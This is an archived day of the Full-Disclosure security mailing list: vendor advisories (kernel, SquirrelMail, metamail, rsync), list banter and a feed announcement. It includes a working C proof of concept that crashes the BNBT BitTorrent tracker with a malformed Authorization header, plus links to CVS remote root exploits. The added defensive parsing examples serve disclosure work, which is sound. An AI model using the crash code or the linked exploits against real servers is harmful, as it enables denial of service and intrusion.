[Full-Disclosure] MDKSA-2004:050 - Updated kernel packages fix multiple vulnerabilities

2004-05-21 Thread Mandrake Linux Security Team
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandrakelinux Security Update Advisory
 ___

 Package name:           kernel
 Advisory ID:            MDKSA-2004:050
 Date:                   May 21st, 2004

 Affected versions:      10.0, 9.2
 __

 Problem Description:

 Brad Spender discovered an exploitable bug in the cpufreq code in
 the Linux 2.6 kernel (CAN-2004-0228).
 
 As well, a permissions problem existed on some SCSI drivers; a fix
 from Olaf Kirch is provided that changes the mode from 0777 to 0600.
 
 This update also provides a 10.0/amd64 kernel with fixes for the
 previous MDKSA-2004:037 advisory as well as the above-noted fixes.
 
 The provided packages are patched to fix these vulnerabilities.  All
 users are encouraged to upgrade to these updated kernels.
 
 To update your kernel, please follow the directions located at:
 
   http://www.mandrakesoft.com/kernelupdate
 ___

 References:

  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0228
 __

 Updated Packages:
  
 ___

 To upgrade automatically use MandrakeUpdate or u

Re: [Full-Disclosure] Password in the Activations Email

2004-05-21 Thread Kye Lewis
Is this necessarily worthy of a post to FD?

I have never used that site, but I would only consider it evil if:

1) I gave it a password at signup
and
2) It emailed that password back to me

or

3) The password was not changeable

or

4) the signup procedure before the activation
required enough information about you that someone
intercepting the mail could cause you problems

or

5) the email sent out contained a considerable
amount of, and potentially harmful, information
about you or connected to you

(the first has happened to me only a small handful of times, I've never
had the others happen)

If one of those is the case, then it's terrible, but I still don't
believe it's worthy of a CC to full-disclosure.

However I think if it sends a temporary password out, and it asks you to
change it, then that is fine in my books; it's akin to sending out an
activation "code" that one must enter to activate an account.

-- 
Kye Lewis <[EMAIL PROTECTED]>

On Sat, 2004-05-22 at 13:15, Aditya, ALD [Aditya Lalit Deshmukh] wrote:
> Dear sir, 
>  
> I just received the activation email from the stormpay.com 
> the activation email contains the password to the site!
>  
> sir may i know why does the stormpay.com send the password by email
> with *all* the account details to the email address in plaintext that
> is not encrypted ?
>  
> i would like to know if during the transmission of the email if some
> one got hold of the mail and misused the account who would be
> responsible for it ? 
>  
>  
> hoping the u would quickly.
> -aditya


___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


RE: [inbox] [Full-Disclosure] Remember the subject about posting the exploit?

2004-05-21 Thread Exibar
Wow, such deep insight.  HELLLO, almost all the "big" worms had
vulnerabilities published, in some cases years before the worm was released.

  There is a solution APPLY THE DARNED PATCHES

 Ex

> -Original Message-
> From: RandallM [mailto:[EMAIL PROTECTED]
> Sent: Friday, May 21, 2004 7:11 PM
> To: [EMAIL PROTECTED]
> Subject: [inbox] [Full-Disclosure] Remember the subject about posting
> the exploit?
>
>
> Well, concerning the German Teenager who is responsible for releasing
> sasser, Mitnick states:
>
> "He was no great technical expert. There was a published vulnerability and
> he took his worm and used his exploit code to be able to propagate it in the
> many systems that Sasser touched."
>
> http://www.zone-h.com/en/news/read/id=4245/
>
> Just my point justified. A more protective measure must surely exist?
>
> Like I said before I play counter strike. The kids 12-18 years old on there
> know c+ like the back of their hand and brag about which university their
> bots got into that day and the number of bots they own.
>
> thank you
>
> Randall M

[Full-Disclosure] Password in the Activations Email

2004-05-21 Thread Aditya, ALD [Aditya Lalit Deshmukh]



Dear sir,

I just received the activation email from the stormpay.com
the activation email contains the password to the site!

sir may i know why does the stormpay.com send the password by email with
*all* the account details to the email address in plaintext that is not
encrypted ?

i would like to know if during the transmission of the email if some one
got hold of the mail and misused the account who would be responsible for it ?

hoping the u would quickly.
-aditya


[Full-Disclosure] BNBT BitTorrent Tracker Denial Of Service

2004-05-21 Thread badpack3t
See the following link, or the attached advisory.

http://fux0r.phathookups.com/advisory/sp-x12-advisory.txt


badpack3t
www.security-protocols.com
SP Research Labs Advisory x12
-

BNBT BitTorrent Tracker Denial Of Service
-

Versions:
cbtt75_20040515
Beta 7.5 Release 2 and prior versions

Vendors:  
http://bnbt.go-dedicated.com/
http://bnbteasytracker.sourceforge.net/
http://sourceforge.net/projects/bnbtusermods/

Date Released - 5.21.2004


Product Description from the vendor:

BNBT was written by Trevor Hogan. BNBT is a complete port of the original
Python BitTorrent tracker to C++ for speed and efficiency. BNBT also offers
many additional features beyond the original Python BitTorrent tracker, plus
it's easy to use and customizable. BNBT is covered under the GNU Lesser
General Public License (LGPL).


Details:

A specifically crafted HTTP GET request which contains
'Authorization: Basic A==' will cause the BNBT server to crash. It may be
possible to execute arbitrary code. Previous versions are also affected by
this vulnerability.  The bug is located in util.cpp in the
Util_DecodeHTTPAuth function.


Exploit:

Attached to this advisory is very basic PoC code which only causes the BNBT
server to crash.

--
Tested on: 
WindowsXP SP1

peace out,

--
badpack3t
www.security-protocols.com
--

//
   PoC to crash the server
//

/* BNBT BitTorrent Tracker Denial Of Service
   
   Versions:
   cbtt75_20040515
   Beta 7.5 Release 2 and prior versions
  
   Vendors:
   http://bnbt.go-dedicated.com/
   http://bnbteasytracker.sourceforge.net/
   http://sourceforge.net/projects/bnbtusermods/
   
   The bug is located in util.cpp in the Util_DecodeHTTPAuth function.

   Coded and Discovered by:
   badpack3t <[EMAIL PROTECTED]>
   .:sp research labs:.
   www.security-protocols.com
   5.21.2004

   This PoC will only DoS the server to verify if it is vulnerable.
 */

#include <winsock2.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#pragma comment(lib, "ws2_32.lib")

/* Request carrying the Authorization header described in the advisory */
char exploit[] =
    "GET / HTTP/1.0\r\n"
    "Authorization: Basic A==\r\n\r\n";

int main(int argc, char *argv[])
{
    WSADATA wsaData;
    WORD wVersionRequested;
    struct hostent *pTarget;
    struct sockaddr_in sock;
    char *target;
    int port, bufsize;
    SOCKET mysocket;

    if (argc < 2)
    {
        printf("BNBT BitTorrent Tracker DoS by badpack3t\r\n <[EMAIL PROTECTED]>\r\n\r\n", argv[0]);
        printf("Usage:\r\n %s  [targetport] (default is 6969)\r\n\r\n", argv[0]);
        printf("www.security-protocols.com\r\n\r\n", argv[0]);
        exit(1);
    }

    wVersionRequested = MAKEWORD(1, 1);
    /* WSAStartup returns 0 on success and a positive error code otherwise */
    if (WSAStartup(wVersionRequested, &wsaData) != 0) return -1;

    target = argv[1];
    port = 6969;

    if (argc >= 3) port = atoi(argv[2]);
    bufsize = 1024;
    if (argc >= 4) bufsize = atoi(argv[3]);

    mysocket = socket(AF_INET, SOCK_STREAM, 0);
    if (mysocket == INVALID_SOCKET)
    {
        printf("Socket error!\r\n");
        exit(1);
    }

    printf("Resolving Hostnames...\n");
    if ((pTarget = gethostbyname(target)) == NULL)
    {
        printf("Resolve of %s failed\n", argv[1]);
        exit(1);
    }

    memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);
    sock.sin_family = AF_INET;
    sock.sin_port = htons((USHORT)port);

    printf("Connecting...\n");
    if ((connect(mysocket, (struct sockaddr *)&sock, sizeof(sock))))
    {
        printf("Couldn't connect to host.\n");
        exit(1);
    }

    printf("Connected!...\n");
    printf("Sending Payload...\n");
    if (send(mysocket, exploit, sizeof(exploit) - 1, 0) == -1)
    {
        printf("Error Sending the Exploit Payload\r\n");
        closesocket(mysocket);
        exit(1);
    }

    printf("Payload has been sent! Check if the webserver is dead.\r\n");
    closesocket(mysocket);
    WSACleanup();
    return 0;
}
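
The advisory above places the crash in Util_DecodeHTTPAuth but does not describe the root cause. As an added example (not BNBT's code and not part of the original post), this is a defensive decoder for Basic credentials that rejects the `A==` value and other malformed input; the function names, result codes and buffer sizes are assumptions.

```c
/* Added example: strict HTTP Basic credential decoding (not BNBT's code). */
#include <ctype.h>
#include <stdio.h>
#include <string.h>

enum auth_result { AUTH_OK, AUTH_NOT_BASIC, AUTH_BAD_BASE64, AUTH_NO_COLON, AUTH_TOO_LONG };

/* Map one base64 alphabet character to its 6-bit value; -1 if not in the alphabet. */
static int b64_val(unsigned char c)
{
    if (c >= 'A' && c <= 'Z') return c - 'A';
    if (c >= 'a' && c <= 'z') return c - 'a' + 26;
    if (c >= '0' && c <= '9') return c - '0' + 52;
    if (c == '+') return 62;
    if (c == '/') return 63;
    return -1;
}

/* Decode only well-formed base64: non-empty, length a multiple of 4, padding
 * confined to the end of the last group. Returns the byte count or -1. */
static int b64_decode_strict(const char *in, size_t inlen, unsigned char *out, size_t outcap)
{
    size_t i, o = 0;

    if (inlen == 0 || inlen % 4 != 0)
        return -1;                      /* "A==" (3 characters) is rejected here */
    for (i = 0; i < inlen; i += 4) {
        int last = (i + 4 == inlen);
        int pad2 = (in[i + 2] == '='), pad3 = (in[i + 3] == '=');
        int a = b64_val((unsigned char)in[i]);
        int b = b64_val((unsigned char)in[i + 1]);
        int c = pad2 ? 0 : b64_val((unsigned char)in[i + 2]);
        int d = pad3 ? 0 : b64_val((unsigned char)in[i + 3]);
        size_t n = pad2 ? 1 : (pad3 ? 2 : 3);   /* bytes this group yields */

        if (a < 0 || b < 0 || c < 0 || d < 0) return -1;
        if ((pad2 || pad3) && !last) return -1; /* padding before the end */
        if (pad2 && !pad3) return -1;           /* "x=y" is not valid padding */
        if (o + n > outcap) return -1;
        out[o++] = (unsigned char)((a << 2) | (b >> 4));
        if (n > 1) out[o++] = (unsigned char)(((b & 0x0f) << 4) | (c >> 2));
        if (n > 2) out[o++] = (unsigned char)(((c & 0x03) << 6) | d);
    }
    return (int)o;
}

/* Parse the value of an Authorization header into NUL-terminated user and
 * password strings. Every length is checked before anything is copied. */
int parse_basic_auth(const char *value, char *user, size_t ucap, char *pass, size_t pcap)
{
    static const char scheme[] = "basic ";
    unsigned char buf[192];
    const unsigned char *colon;
    size_t i, toklen, ulen, plen;
    int n;

    if (value == NULL || user == NULL || pass == NULL || ucap == 0 || pcap == 0)
        return AUTH_NOT_BASIC;
    user[0] = pass[0] = '\0';
    for (i = 0; i < 6; i++)             /* the scheme name is case-insensitive */
        if (tolower((unsigned char)value[i]) != scheme[i])
            return AUTH_NOT_BASIC;
    value += 6;
    toklen = strcspn(value, " \t\r\n"); /* token ends at the first whitespace */
    if (toklen / 4 * 3 > sizeof buf)
        return AUTH_TOO_LONG;
    n = b64_decode_strict(value, toklen, buf, sizeof buf);
    if (n < 0 || memchr(buf, '\0', (size_t)n) != NULL)
        return AUTH_BAD_BASE64;         /* malformed, or NUL inside credentials */
    colon = memchr(buf, ':', (size_t)n);
    if (colon == NULL)
        return AUTH_NO_COLON;           /* decoded fine but is not "user:pass" */
    ulen = (size_t)(colon - buf);
    plen = (size_t)n - ulen - 1;
    if (ulen >= ucap || plen >= pcap)
        return AUTH_TOO_LONG;
    memcpy(user, buf, ulen);
    user[ulen] = '\0';
    memcpy(pass, colon + 1, plen);
    pass[plen] = '\0';
    return AUTH_OK;
}

int main(void)
{
    /* Constructed header values; the first is the one quoted in the advisory. */
    static const char *samples[] = { "Basic A==", "Basic QQ==", "Basic dXNlcjpwYXNz", "Bearer abc" };
    char u[64], p[64];
    size_t i;

    for (i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("%-22s -> %d\n", samples[i], parse_basic_auth(samples[i], u, sizeof u, p, sizeof p));
    return 0;
}
```
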

[Full-Disclosure] Remember the subject about posting the exploit?

2004-05-21 Thread RandallM
Well, concerning the German Teenager who is responsible for releasing
sasser, Mitnick states:

"He was no great technical expert. There was a published vulnerability and
he took his worm and used his exploit code to be able to propagate it in the
many systems that Sasser touched."

http://www.zone-h.com/en/news/read/id=4245/

Just my point justified. A more protective measure must surely exist?

Like I said before I play counter strike. The kids 12-18 years old on there
know c+ like the back of their hand and brag about which university their
bots got into that day and the number of bots they own.

thank you

Randall M




[Full-Disclosure] [ GLSA 200405-16 ] Multiple XSS Vulnerabilities in SquirrelMail

2004-05-21 Thread Rajiv Aaron Manglani
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200405-16
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: Multiple XSS Vulnerabilities in SquirrelMail
      Date: May 21, 2004
      Bugs: #49675
        ID: 200405-16

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


SquirrelMail is subject to several XSS and one SQL injection
vulnerability.

Background
==

SquirrelMail is a webmail package written in PHP. It supports IMAP and
SMTP, and can optionally be installed with SQL support.

Affected packages
=

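    -------------------------------------------------------------------
     Package                 /   Vulnerable   /             Unaffected
    -------------------------------------------------------------------
  1  net-mail/squirrelmail        <= 1.4.2               >= 1.4.3_rc1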

Description
===

Several unspecified cross-site scripting (XSS) vulnerabilities and a
well hidden SQL injection vulnerability were found. An XSS attack
allows an attacker to insert malicious code into a web-based
application. SquirrelMail does not check for code when parsing
variables received via the URL query string.

Impact
==

One of the XSS vulnerabilities could be exploited by an attacker to
steal cookie-based authentication credentials from the user's browser.
The SQL injection issue could potentially be used by an attacker to run
arbitrary SQL commands inside the SquirrelMail database with privileges
of the SquirrelMail database user.

Workaround
==

There is no known workaround at this time. All users are advised to
upgrade to version 1.4.3_rc1 or higher of SquirrelMail.

Resolution
==

All SquirrelMail users should upgrade to the latest stable version:

# emerge sync

# emerge -pv ">=net-mail/squirrelmail-1.4.3_rc1"
# emerge ">=net-mail/squirrelmail-1.4.3_rc1"

References
==

  [ 1 ] SquirrelMail 1.4.3_rc1 release announcement
        http://sourceforge.net/mailarchive/forum.php?thread_id=4199060&forum_id=1988
  [ 2 ] Bugtraq security announcement
        http://www.securityfocus.com/bid/10246/
  [ 3 ] CERT description of XSS
        http://www.cert.org/advisories/CA-2000-02.html

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

 http://security.gentoo.org/glsa/glsa-200405-16.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2004 Gentoo Technologies, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/1.0

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.2.3 (Darwin)

iD8DBQFArkYbnt0v0zAqOHYRAsbCAKCgFyTi3benON9CIPi1Z/Zs85KXFgCeKOeF
SbrQqZQoiK2N2QPn8FuWUHw=
=HZpB
-END PGP SIGNATURE-



[Full-Disclosure] [ GLSA 200405-17 ] Multiple vulnerabilities in metamail

2004-05-21 Thread Thierry Carrez
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200405-17
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
     Title: Multiple vulnerabilities in metamail
      Date: May 21, 2004
      Bugs: #42133
        ID: 200405-17

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


Several format string bugs and buffer overflows were discovered in
metamail, potentially allowing execution of arbitrary code remotely.

Background
==

Metamail is a program that decodes MIME encoded mail. It is therefore
often automatically called when an email is received or read.

Affected packages
=

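    -------------------------------------------------------------------
     Package                 /   Vulnerable   /             Unaffected
    -------------------------------------------------------------------
  1  net-mail/metamail           < 2.7.45.3                >= 2.7.45.3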

Description
===

Ulf Harnhammar found two format string bugs and two buffer overflow
bugs in Metamail.

Impact
==

A remote attacker could send a malicious email message and execute
arbitrary code with the rights of the process calling the Metamail
program.

Workaround
==

There is no known workaround at this time.

Resolution
==

All users of Metamail should upgrade to the latest stable version:

# emerge sync

# emerge -pv ">=net-mail/metamail-2.7.45.3"
# emerge ">=net-mail/metamail-2.7.45.3"

References
==

  [ 1 ] CAN-2004-0104
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0104
  [ 2 ] CAN-2004-0105
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0105

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

 http://security.gentoo.org/glsa/glsa-200405-17.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2004 Gentoo Technologies, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/1.0

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.2.4 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFArltcvcL1obalX08RArLOAJ9YFERhJfcJrzZthA7HVjbLmyxazwCgqghl
l/eXbhtKh4BVtCGmVPSD2zs=
=GdJa
-END PGP SIGNATURE-



[Full-Disclosure] CVS Entry Line Overflow EXPLOIT ...

2004-05-21 Thread ElviS .de
CVS Remote Entry Line Heap Overflow Root Exploit (Solaris)
http://www.k-otik.com/exploits/05212004.CVS_Solaris.c.php
CVS Remote Entry Line Heap Overflow Root Exploit (Linux/FreeBSD)
http://www.k-otik.com/exploits/05212004.CVS_Linux.c.php
...


RE: [Full-Disclosure] C# Web application security scanner

2004-05-21 Thread Sean Crawford

Ron Dufresne wrote>

>I'll bet he/she still drives the usenet folks buggy seeking folks to
>complete his homework as well.

And also older than most of the teachers at its school!



On Fri, 21 May 2004, Sean Crawford wrote:

> Ron Dufresne wrote>
>
> >the harry potter and lord of the rings movies must have blinded many here
> >to trolls and flamebait.
>
> Surely any sane person would see right through this!.
> Although the offer of doing his work for him with no pay is tempting
> :-)
>
> >On Thu, 20 May 2004 [EMAIL PROTECTED] wrote:
>
> > I want to start my own web application security company using open source
> > code so I don't have to pay for it. That way I can get everyone else to do
> > my work for me and make lots of money



Re: [Full-Disclosure] C# Web application security scanner

2004-05-21 Thread Denis Dimick

As soon as I saw the C# I knew it was a troll..



On Fri, 21 May 2004, Mister Coffee wrote:

> 
> Don't feed the trolls...
> 
> 
> On Thu, May 20, 2004 at 03:24:01PM -0400, [EMAIL PROTECTED] wrote:
> > I want to start my own web application security company using open source code so 
> > I don't have to pay for it. That way I can get everyone else to do my work for me 
> > and make lots of money
> > 
> > -Original Message-
> > From: Martin Mkrtchian <[EMAIL PROTECTED]>
> > Sent: May 20, 2004 1:05 PM
> > To: [EMAIL PROTECTED]
> > Cc: [EMAIL PROTECTED], [EMAIL PROTECTED], 
> > [EMAIL PROTECTED], [EMAIL PROTECTED]
> > Subject: Re: [Full-Disclosure] C# Web application security scanner
> > 
> > Why would u want to start your company with someone elses code? Web
> > application scanner? Are you refering to something like APPSCAN type
> > thing or are you refering to VA Scanner type thing like Nessus. If you
> > are seeking for something like Nessus, then obviously the code is out
> > there, hire someone to customize it to your needs.
> > 
> > 
> > On Thu, 20 May 2004 10:08:26 +0530, Aditya, ALD [Aditya Lalit
> > Deshmukh] <[EMAIL PROTECTED]> wrote:
> > > 
> > > 
> > > 
> > > > [EMAIL PROTECTED] wrote:
> > > >
> > > > >Can anyone give me the source code to a good web application
> > > > security scanner written
> > > > >in C# so I can start my own company? Drop me an email with a
> > > > link or code off of
> > > > >the list please.
> > > 
> > > since u are starting your own company, i would be very happy to write one for u 
> > > and share it with the list provided you pay me for doing this, wouldent u agree ?
> > > 


RE: [Full-Disclosure] C# Web application security scanner

2004-05-21 Thread Ron DuFresne

I'll bet he/she still drives the usenet folks buggy seeking folks to
complete his homework as well.

Thanks,

Ron DuFresne


On Fri, 21 May 2004, Sean Crawford wrote:

> Ron Dufresne wrote>
>
> >the harry potter and lord of the rings movies must have blinded many here
> >to trolls and flamebait.
>
> Surely any sane person would see right through this!.
> Although the offer of doing his work for him with no pay is tempting
> :-)
>
> >On Thu, 20 May 2004 [EMAIL PROTECTED] wrote:
>
> > I want to start my own web application security company using open source
> > code so I don't have to pay for it. That way I can get everyone else to do
> > my work for me and make lots of money
> >
> > -Original Message-
> > From: Martin Mkrtchian <[EMAIL PROTECTED]>
> > Sent: May 20, 2004 1:05 PM
> > To: [EMAIL PROTECTED]
> > Cc: [EMAIL PROTECTED], [EMAIL PROTECTED],
> > [EMAIL PROTECTED], [EMAIL PROTECTED]
> > Subject: Re: [Full-Disclosure] C# Web application security scanner
> >
> > Why would u want to start your company with someone elses code? Web
> > application scanner? Are you refering to something like APPSCAN type
> > thing or are you refering to VA Scanner type thing like Nessus. If you
> > are seeking for something like Nessus, then obviously the code is out
> > there, hire someone to customize it to your needs.
> >
> >
> > On Thu, 20 May 2004 10:08:26 +0530, Aditya, ALD [Aditya Lalit
> > Deshmukh] <[EMAIL PROTECTED]> wrote:
> > >
> > >
> > >
> > > > [EMAIL PROTECTED] wrote:
> > > >
> > > > >Can anyone give me the source code to a good web application
> > > > security scanner written
> > > > >in C# so I can start my own company? Drop me an email with a
> > > > link or code off of
> > > > >the list please.
> > >
> > > since u are starting your own company, i would be very happy to write
> > > one for u and share it with the list provided you pay me for doing this,
> > > wouldent u agree ?

~~
"Cutting the space budget really restores my faith in humanity.  It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation." -- Johnny Hart
***testing, only testing, and damn good at it too!***

OK, so you're a Ph.D.  Just don't touch anything.



[Full-Disclosure] [OpenPKG-SA-2004.025] OpenPKG Security Advisory (rsync)

2004-05-21 Thread OpenPKG
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1



OpenPKG Security Advisory                            The OpenPKG Project
http://www.openpkg.org/security.html              http://www.openpkg.org
[EMAIL PROTECTED]                                       [EMAIL PROTECTED]
OpenPKG-SA-2004.025                                          21-May-2004


Package:             rsync
Vulnerability:       filesystem intrusion
OpenPKG Specific:    no

Affected Releases:   Affected Packages:       Corrected Packages:
OpenPKG CURRENT      <= rsync-2.6.0-20040324  >= rsync-2.6.1-20040428
OpenPKG 2.0          <= rsync-2.6.0-2.0.0     >= rsync-2.6.0-2.0.1
OpenPKG 1.3          <= rsync-2.5.6-1.3.1     >= rsync-2.5.6-1.3.2

Dependent Packages:  none

Description:
  According to a Rsync [0] security advisory [1], versions before
  2.6.1 do not properly sanitize paths when running as a read/write
  daemon without using chroot(2). This allows remote attackers to write
  files outside of the module's path. The OpenPKG default is to run
  a read-only daemon using chroot(2). The Common Vulnerabilities and
  Exposures (CVE) project assigned the id CAN-2004-0426 [2] to the
  problem.

  Please check whether you are affected by running "/bin/rpm -q
  rsync". If you have the "rsync" package installed and its version is
  affected (see above), we recommend that you immediately upgrade it
  (see Solution) [3][4].

Solution:
  Select the updated source RPM appropriate for your OpenPKG release
  [5][6], fetch it from the OpenPKG FTP service [7][8] or a mirror
  location, verify its integrity [9], build a corresponding binary RPM
  from it [3] and update your OpenPKG installation by applying the
  binary RPM [4]. For the most recent release OpenPKG 2.0, perform the
  following operations to permanently fix the security problem (for
  other releases adjust accordingly).

  $ ftp ftp.openpkg.org
  ftp> bin
  ftp> cd release/2.0/UPD
  ftp> get rsync-2.6.0-2.0.1.src.rpm
  ftp> bye
  $ /bin/openpkg rpm -v --checksig rsync-2.6.0-2.0.1.src.rpm
  $ /bin/openpkg rpm --rebuild rsync-2.6.0-2.0.1.src.rpm
  $ su -
  # /bin/openpkg rpm -Fvh /RPM/PKG/rsync-2.6.0-2.0.1.*.rpm


References:
  [0] http://rsync.samba.org/
  [1] http://rsync.samba.org/index.html#security_apr04
  [2] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0426
  [3] http://www.openpkg.org/tutorial.html#regular-source
  [4] http://www.openpkg.org/tutorial.html#regular-binary
  [5] ftp://ftp.openpkg.org/release/1.3/UPD/rsync-2.5.6-1.3.2.src.rpm
  [6] ftp://ftp.openpkg.org/release/2.0/UPD/rsync-2.6.0-2.0.1.src.rpm
  [7] ftp://ftp.openpkg.org/release/1.3/UPD/
  [8] ftp://ftp.openpkg.org/release/2.0/UPD/
  [9] http://www.openpkg.org/security.html#signature


For security reasons, this advisory was digitally signed with the
OpenPGP public key "OpenPKG <[EMAIL PROTECTED]>" (ID 63C4CB9F) of the
OpenPKG project which you can retrieve from http://pgp.openpkg.org and
hkp://pgp.openpkg.org. Follow the instructions on http://pgp.openpkg.org/
for details on how to verify the integrity of this advisory.


-BEGIN PGP SIGNATURE-
Comment: OpenPKG <[EMAIL PROTECTED]>

iD8DBQFArivtgHWT4GPEy58RAnEFAJ44zlK748Yrc6UT/1a1iIESRxJJ+wCePQFs
NmRw90v1Pry2EhTfrDO2D+U=
=zbta
-END PGP SIGNATURE-
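
The advisory above describes a daemon that, without chroot(2), must itself keep client-supplied paths inside the module directory. As an added example (not rsync's or OpenPKG's code, and not part of the original advisory), this is a lexical containment check in C; the function names and the sample module root `/srv/module` are assumptions.

```c
/* Added example: keep a client-supplied path inside a module directory. */
#include <stdio.h>
#include <string.h>

/* Normalize a relative request path into out. Returns 0 on success, or -1 if
 * the request is absolute, empty, too long, or climbs above the module root.
 * This is a lexical check only: symlinks inside the module are not resolved,
 * which is the part chroot(2) would otherwise cover. */
int sanitize_module_path(const char *req, char *out, size_t outcap)
{
    size_t o = 0;           /* bytes written to out so far */
    int depth = 0;          /* components currently below the module root */
    const char *p = req;

    if (req == NULL || out == NULL || outcap < 2 || req[0] == '\0' || req[0] == '/')
        return -1;
    while (*p != '\0') {
        const char *end = strchr(p, '/');
        size_t len = end ? (size_t)(end - p) : strlen(p);

        if (len == 0 || (len == 1 && p[0] == '.')) {
            /* empty component ("//") or ".": nothing to do */
        } else if (len == 2 && p[0] == '.' && p[1] == '.') {
            if (depth == 0)
                return -1;  /* ".." would leave the module root */
            while (o > 0 && out[o - 1] != '/')
                o--;        /* drop the last component */
            if (o > 0)
                o--;        /* and the separator before it */
            depth--;
        } else {
            size_t need = len + (o > 0 ? 1 : 0);
            if (o + need >= outcap)
                return -1;  /* no room for the component plus the NUL */
            if (o > 0)
                out[o++] = '/';
            memcpy(out + o, p, len);
            o += len;
            depth++;
        }
        p += len;
        if (*p == '/')
            p++;
    }
    if (o == 0)
        out[o++] = '.';     /* the request normalized to the root itself */
    out[o] = '\0';
    return 0;
}

/* Join the module root with a sanitized request; -1 if rejected or too long. */
int resolve_in_module(const char *module_root, const char *req, char *out, size_t outcap)
{
    char rel[1024];
    int n;

    if (module_root == NULL || sanitize_module_path(req, rel, sizeof rel) != 0)
        return -1;
    n = snprintf(out, outcap, "%s/%s", module_root, rel);
    return (n < 0 || (size_t)n >= outcap) ? -1 : 0;
}

int main(void)
{
    /* Constructed request paths as a client might send them. */
    static const char *reqs[] = { "incoming/./a.txt", "incoming/../../etc/cron.d/x", "/etc/passwd" };
    char full[2048];
    size_t i;

    for (i = 0; i < sizeof reqs / sizeof reqs[0]; i++) {
        if (resolve_in_module("/srv/module", reqs[i], full, sizeof full) == 0)
            printf("%-30s -> %s\n", reqs[i], full);
        else
            printf("%-30s -> rejected\n", reqs[i]);
    }
    return 0;
}
```
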



Re: [Full-Disclosure] C# Web application security scanner

2004-05-21 Thread Mister Coffee

Don't feed the trolls...


On Thu, May 20, 2004 at 03:24:01PM -0400, [EMAIL PROTECTED] wrote:
> I want to start my own web application security company using open source code so I 
> don't have to pay for it. That way I can get everyone else to do my work for me and 
> make lots of money
> 
> -Original Message-
> From: Martin Mkrtchian <[EMAIL PROTECTED]>
> Sent: May 20, 2004 1:05 PM
> To: [EMAIL PROTECTED]
> Cc: [EMAIL PROTECTED], [EMAIL PROTECTED], 
>   [EMAIL PROTECTED], [EMAIL PROTECTED]
> Subject: Re: [Full-Disclosure] C# Web application security scanner
> 
> Why would u want to start your company with someone elses code? Web
> application scanner? Are you refering to something like APPSCAN type
> thing or are you refering to VA Scanner type thing like Nessus. If you
> are seeking for something like Nessus, then obviously the code is out
> there, hire someone to customize it to your needs.
> 
> 
> On Thu, 20 May 2004 10:08:26 +0530, Aditya, ALD [Aditya Lalit
> Deshmukh] <[EMAIL PROTECTED]> wrote:
> > 
> > 
> > 
> > > [EMAIL PROTECTED] wrote:
> > >
> > > >Can anyone give me the source code to a good web application
> > > security scanner written
> > > >in C# so I can start my own company? Drop me an email with a
> > > link or code off of
> > > >the list please.
> > 
> > since u are starting your own company, i would be very happy to write one for u 
> > and share it with the list provided you pay me for doing this, wouldent u agree ?


Re: [Full-Disclosure] Web interface for full-disclosure and others

2004-05-21 Thread vertex
Actually, you can use the following to get a feed for full-disclosure and
bugtraq on your website,

<script src="http://www.securitytrap.com/seclist.js"></script>
<script src="http://www.securitytrap.com/list_display.js"></script>
<script>
var full_max = '10';
var bugtraq_max = '10';
var securitytrap_max = '4';
listDisplay();
</script>

tune the value for the items displayed.

-vertex 

On Fri, May 21, 2004 at 09:27:54AM -0400, William Warren wrote:
> wow that's nice.. any chance of you setting up an rss feed of your site?
> 
> vertex wrote:
> 
> >Hello,
> >
> >I am building a web interface which will help make monitoring the 
> >mailing list easier. The interface gets the RSS feeds from
> >seclist.org and other web sites and converts them into a single
> >web interface. Now the web interface includes full-disclosure,
> >bugtraq, Internet Storm Center, OSVDB, and others. 
> >
> >The web interface also includes a Drupal based forum.
> >
> >Check it out at http://www.securitytrap.com/mail.html
> >
> >Any suggestion is welcome,
> >
> >-vertex
> 
> -- 
> My "Foundation" verse:
> Isa 54:17  No weapon that is formed against thee shall prosper; and 
> every tongue that shall rise against thee in judgment thou shalt 
> condemn. This is the heritage of the servants of the LORD, and their 
> righteousness is of me, saith the LORD.
> 

-- 
